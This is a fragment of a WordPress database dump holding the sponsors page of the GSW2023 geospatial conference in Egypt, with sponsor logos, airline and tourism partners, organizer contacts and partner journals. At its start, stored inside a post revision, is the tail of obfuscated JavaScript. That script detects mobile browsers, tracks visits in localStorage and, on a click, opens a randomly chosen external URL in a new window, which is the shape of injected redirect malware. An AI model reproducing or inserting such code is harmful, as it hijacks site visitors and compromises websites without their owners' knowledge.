)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 00:33:22','2023-08-16 00:33:22','',3066,'https://gsw2023.com/?p=5264',0,'revision','',0),
(5265,1,'2023-08-16 00:33:45','2023-08-16 00:33:45','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\n<h3 style=\"text-align: center;\"></h3>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference 